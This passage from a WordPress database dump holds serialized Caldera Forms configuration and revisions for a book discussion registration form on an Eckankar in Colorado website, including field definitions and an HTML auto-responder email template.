Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:16:\"<p>{summary}</p>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8560:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\">&nbsp;</p>\n<p>&nbsp;</p>\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n<p class=\"\">&nbsp;</p>\n<p class=\"\">&nbsp;</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 18px; font-family: Open Sans; font-weight: 600; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 40px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Class - Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 16px; color: #4c4747; line-height: 33px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %firstname%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us. We will only use your information to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 0px 30px; height: 25px;\" bgcolor=\"#ffffff\" align=\"center\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px;\" bgcolor=\"#CCCCCC\" align=\"center\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"color: #4c4747; font-size: 17px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request on the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"color: #4c4747; font-size: 16px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 16px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(29,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Tue, 27 Apr 2021 17:25:18 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:140:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>									\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:16:\"<p>{summary}</p>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8507:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 18px; font-family: Open Sans; font-weight: 600; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 40px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 16px; color: #4c4747; line-height: 33px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %firstname%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us. We will only use your information to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 0px 30px; height: 25px;\" bgcolor=\"#ffffff\" align=\"center\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#CCCCCC\" align=\"center\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"color: #4c4747; font-size: 17px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request on the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"color: #4c4747; font-size: 16px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 16px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(30,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Tue, 27 Apr 2021 17:32:00 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:140:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>									